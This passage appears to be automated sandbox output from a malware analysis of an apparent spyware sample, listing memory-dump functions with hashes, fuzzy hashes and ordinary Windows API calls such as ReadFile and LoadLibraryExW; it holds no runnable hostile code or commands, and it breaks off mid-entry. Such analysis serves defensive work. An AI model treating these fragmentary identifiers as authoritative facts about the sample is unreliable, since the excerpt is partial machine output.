                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                      • Instruction ID: bc1658cc3be21eae7208c755f9325cfd17512aa16dbe5b73a5d040d64805d1c8
                                                      • Opcode Fuzzy Hash: 70dfe4c7473eb6f941a97d5a7ab449bfac797b3aee8241ce1b8663f59600b234
                                                      • Instruction Fuzzy Hash: 52018471C00649EBCF11AF79CD0189EBB61AF86760F184115F8242B1E1DB398A21EF91
                                                      APIs
                                                        • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                      • __lock_file.LIBCMT ref: 00AA560B
                                                        • Part of subcall function 00AA6E3E: __lock.LIBCMT ref: 00AA6E61
                                                      • __fclose_nolock.LIBCMT ref: 00AA5616
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                      • Instruction ID: c9fc389840311a78ed505a40683ff5d8f5689c9438f09ff3bfa0b0871f83fa58
                                                      • Opcode Fuzzy Hash: 1559d60b89368231b1f167067845b44ac7732f80a039728024bd7af6bc5c5cd5
                                                      • Instruction Fuzzy Hash: 3EF0B471C02B069BD720ABB9890276E77E16F43330F258209E424AB1C1CB7C89019F59
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: SleepTimetime
                                                      • String ID:
                                                      • API String ID: 346578373-0
                                                      • Opcode ID: c4ed5d35022f36519fc7492f53aeb01e32da4c3dbf63e7cbbf633e8a16550a13
                                                      • Instruction ID: 4aee850882120d85d13d80f6419ad08bb0c6d40fda3303b6d3e3b0a8eb6d69d4
                                                      • Opcode Fuzzy Hash: c4ed5d35022f36519fc7492f53aeb01e32da4c3dbf63e7cbbf633e8a16550a13
                                                      • Instruction Fuzzy Hash: 62F0F871250616AFD360FB69D559BA6B7F8EB49360F004429E82AC73A1DF60AC40CB91
                                                      APIs
                                                      • __lock_file.LIBCMT ref: 00AA5EB4
                                                      • __ftell_nolock.LIBCMT ref: 00AA5EBF
                                                        • Part of subcall function 00AA8D58: __getptd_noexit.LIBCMT ref: 00AA8D58
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                      • String ID:
                                                      • API String ID: 2999321469-0
                                                      • Opcode ID: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                      • Instruction ID: 9aecf0b1ad49fe513e9f7a41f1c062a920d3d06c832813661a3ebde34dad5cc0
                                                      • Opcode Fuzzy Hash: 3c90a370d6cbcc729ba38fafcd6107879483ef48a8ef4db12fd93e80bb08fc82
                                                      • Instruction Fuzzy Hash: 58F0EC32D11615AAD710BB748A0375E76A0AF03331F254206F420BB1D1CF7C4E019B55
                                                      APIs
                                                      • _memset.LIBCMT ref: 00A95AEF
                                                      • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00A95B1F
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell__memset
                                                      • String ID:
                                                      • API String ID: 928536360-0
                                                      • Opcode ID: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                      • Instruction ID: ed71b5cb0920d247f3d03c68132a106e2b62406637a71e046cdeb89200d2d2c4
                                                      • Opcode Fuzzy Hash: 694697a6c3d17b0e7a6ef95d7899acee3584f3a1a6df0a51205c5de1da759938
                                                      • Instruction Fuzzy Hash: 41F0A7719583089FDB929B24DC467D577BCA702308F0002E9FA4897292DFB14B88CF55
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: LoadString$__swprintf
                                                      • String ID:
                                                      • API String ID: 207118244-0
                                                      • Opcode ID: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                      • Instruction ID: 3b9ba3c465c9c05c0118d15915e4c254869507d370f5465be5e3cdd39b967efd
                                                      • Opcode Fuzzy Hash: db3f5d81911007e7f9a6e791eb5f62d3513149e1a416f57eff6ecf9f777dd70f
                                                      • Instruction Fuzzy Hash: 98B13C35A0010E9FCF14EF95C9919FEB7B5FF58760F10811AFA15AB291EB70A941CB50
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                      • Instruction ID: 117f5b2822fdb5acf41958aa9a69d4b4470de0e3b310a77d8d7cc56a50924cdf
                                                      • Opcode Fuzzy Hash: e0e5af78225d6d3d36f6d680479f726b6aede2d0f2297c8db7b636f6276ddc96
                                                      • Instruction Fuzzy Hash: A361B9706046069FEB10EF54C981F7AB7F5EF24300F11806EE91A9B291E774ED81CB62
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0a681f8819779e464b59a0b4eb288fb145cb92d3b73cf67965e6236f4ba5e5f8
                                                      • Instruction ID: f4dae73e9ec02d6d0ccd116c380627d47d61330ab2c6ef7601b6fa53d14b060f
                                                      • Opcode Fuzzy Hash: 0a681f8819779e464b59a0b4eb288fb145cb92d3b73cf67965e6236f4ba5e5f8
                                                      • Instruction Fuzzy Hash: 90513935B00604AFCF14EB68CA92EAE77F6AF45750F158568F806AB392DB30ED41CB51
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                      • Instruction ID: 6ca112584d007b714f0a43eb56c3070cc0cc7a7a44cfb937b8873494a96869b6
                                                      • Opcode Fuzzy Hash: c9f64c45f400e17b5458663199bf4a27315daf1ddd9ff02163ddc624897d631a
                                                      • Instruction Fuzzy Hash: F5319C7A204A02DFCF249F18D480A25F7F0FF49310B15C569E88A8B791DB30E881CB90
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,?,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00A941B2
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: d5bd1d82b14f8fe5d041fe55ae66dd9f01d07409428ce4b3222bd75ddaff8ff2
                                                      • Instruction ID: b3a52333c9e40ee5fe3653c47c411a362e2868e61d0c1a208573d82597fbf7b0
                                                      • Opcode Fuzzy Hash: d5bd1d82b14f8fe5d041fe55ae66dd9f01d07409428ce4b3222bd75ddaff8ff2
                                                      • Instruction Fuzzy Hash: B2313C71B00616AFCF18CF6DC884A9DB7F5BF58310F248719E81597710D770A9A18B90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: 06d97045a3ff0aac559893b6e6e94a9588f9ca3a27201fe2221cef70fe20d7d8
                                                      • Instruction ID: 3d4b4b5b17d35f51a9152329736c03bdc8b2c614dd2fd2711f1531c86fbf5eda
                                                      • Opcode Fuzzy Hash: 06d97045a3ff0aac559893b6e6e94a9588f9ca3a27201fe2221cef70fe20d7d8
                                                      • Instruction Fuzzy Hash: AB411874908341DFEB14EF14C588B5ABBE1BF45358F0989ACE8898B362C371EC85CB52
                                                      APIs
                                                        • Part of subcall function 00A94B29: FreeLibrary.KERNEL32(00000000,?), ref: 00A94B63
                                                        • Part of subcall function 00AA547B: __wfsopen.LIBCMT ref: 00AA5486
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A927AF,?,00000001), ref: 00A949F4
                                                        • Part of subcall function 00A94ADE: FreeLibrary.KERNEL32(00000000), ref: 00A94B18
                                                        • Part of subcall function 00A948B0: _memmove.LIBCMT ref: 00A948FA
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                      • String ID:
                                                      • API String ID: 1396898556-0
                                                      • Opcode ID: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
                                                      • Instruction ID: e1032ed36b5167377229dd9041cb01c573103245c4af7c6dba5606da54b6b442
                                                      • Opcode Fuzzy Hash: 333ac3d7428ddd6b8973de9ade03dbee7942c2beba086517e31ec518f3b007df
                                                      • Instruction Fuzzy Hash: AE11E332750205ABDF10FB70CE06FAE77E99F48741F10842AF542A7591EF709E12ABA4
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: bb1c88631b2d48c29f1fb5d8f37f944824daf594443df68d435730b21e26af8c
                                                      • Instruction ID: c3c89377b96d9e38c2320e137df147b9536b9bf1cc75378619b1a56c96a2222b
                                                      • Opcode Fuzzy Hash: bb1c88631b2d48c29f1fb5d8f37f944824daf594443df68d435730b21e26af8c
                                                      • Instruction Fuzzy Hash: EE212EB4908341DFDB14EF14C548A5ABBE4BF84304F0589ACE88A57362D331E849CB92
                                                      APIs
                                                      • ReadFile.KERNEL32(00000000,?,00010000,00000000,00000000,00000000,00000000,00010000,?,00A93CF8,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A94276
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 173fbd75e8888eb225e33ddbd847703e20c2e74eb8a070b06b95215a1356fefc
                                                      • Instruction ID: 00cbb74f9e4a45e46b296b9c0964ee7a3fc1c8a222af95e14a1da82565c3cd76
                                                      • Opcode Fuzzy Hash: 173fbd75e8888eb225e33ddbd847703e20c2e74eb8a070b06b95215a1356fefc
                                                      • Instruction Fuzzy Hash: BC113A352007019FDB20CF55C880FA2B7F5FF88710F10C92EE8AA8AA50D7B0E846CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID:
                                                      • API String ID: 4104443479-0
                                                      • Opcode ID: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                      • Instruction ID: 2604d5948a8719738e1fc4ed943517223487456092b3e4c1a08f14ec968b0ae4
                                                      • Opcode Fuzzy Hash: 602e865249ec947d912e947e17fccc617bf4509f125e4f05857fa8c8b0e3221e
                                                      • Instruction Fuzzy Hash: 4D01D6722017026ED7245B38DD02F67BBE8DB457E0F10852AF51ACB5D1EB31E8408794
                                                      APIs
                                                      • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00AF4998
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentVariable
                                                      • String ID:
                                                      • API String ID: 1431749950-0
                                                      • Opcode ID: e645e859787772b446803af957bf953bbb341b40517370a53d3260d2f7da31b3
                                                      • Instruction ID: ca8ccb3b4938b18c79e91df6006d2d3a072c22c56c70dbe355ba472886a98861
                                                      • Opcode Fuzzy Hash: e645e859787772b446803af957bf953bbb341b40517370a53d3260d2f7da31b3
                                                      • Instruction Fuzzy Hash: ADF03135608109BFCB14FB65D946CAF77BCEF49360B004059F9089B291EF70AD41C750
                                                      APIs
                                                        • Part of subcall function 00AA0FE6: std::exception::exception.LIBCMT ref: 00AA101C
                                                        • Part of subcall function 00AA0FE6: __CxxThrowException@8.LIBCMT ref: 00AA1031
                                                      • _memset.LIBCMT ref: 00AE7CB4
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw_memsetstd::exception::exception
                                                      • String ID:
                                                      • API String ID: 525207782-0
                                                      • Opcode ID: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                      • Instruction ID: 378b7aae551a4ce7a63242cd33da9c6cfa05379343598904b9379ae5524e5a37
                                                      • Opcode Fuzzy Hash: 5db2a621b77f9f51e6d0df2e5d73dbc3d80b50fddd4bc919c38652e4ccf84bab
                                                      • Instruction Fuzzy Hash: 380119752082019FD321EF5CDA41F09BBE5AF5A310F24C45AF5888B392DB72E800CF90
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: _fseek
                                                      • String ID:
                                                      • API String ID: 2937370855-0
                                                      • Opcode ID: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                      • Instruction ID: 111d26a99ba254541999d008f2d7b63d59a38e2d833a3e5e3b333ec85e0f3e30
                                                      • Opcode Fuzzy Hash: d626904f6cb88cfd62378aba53a4cab051f17c1c31bafaeec442f62cde18398f
                                                      • Instruction Fuzzy Hash: 7EF085B6900208BFDF108F94DC04DEBBBBEEF89320F004198F9045B210D232EA218BA0
                                                      APIs
                                                      • FreeLibrary.KERNEL32(?,?,?,00A927AF,?,00000001), ref: 00A94A63
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: FreeLibrary
                                                      • String ID:
                                                      • API String ID: 3664257935-0
                                                      • Opcode ID: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
                                                      • Instruction ID: 80acbb29bde2e724c9fd8af4ddfe815b69784feff800fdf2239a0ef0bb85510f
                                                      • Opcode Fuzzy Hash: 9ae7015910e87c04e8215fb8ea3407147ed44a56fc48eba4ca61acb12c051203
                                                      • Instruction Fuzzy Hash: EEF01571645702CFCF349F68E890C1ABBF0AF183693208A2EE1D683A10C7319984DB48
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.3349944840.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                      • Associated: 0000000B.00000002.3349898037.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350025906.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350230387.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 0000000B.00000002.3350256053.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_a80000_Spy.jbxd
                                                      Similarity
                                                      • API ID: __fread_nolock
                                                      • String ID:
                                                      • API String ID: 2638373210-0
                                                      • Opcode ID: 1a81c16e28573863898c67bef1386d759a1651ff521f05548b9e3597368886a1
                                                      • Instruction ID: f5d1cf88ad4701d6505689c4cdd9b02b783a64dcb2e08a2128286804a26ca5d1
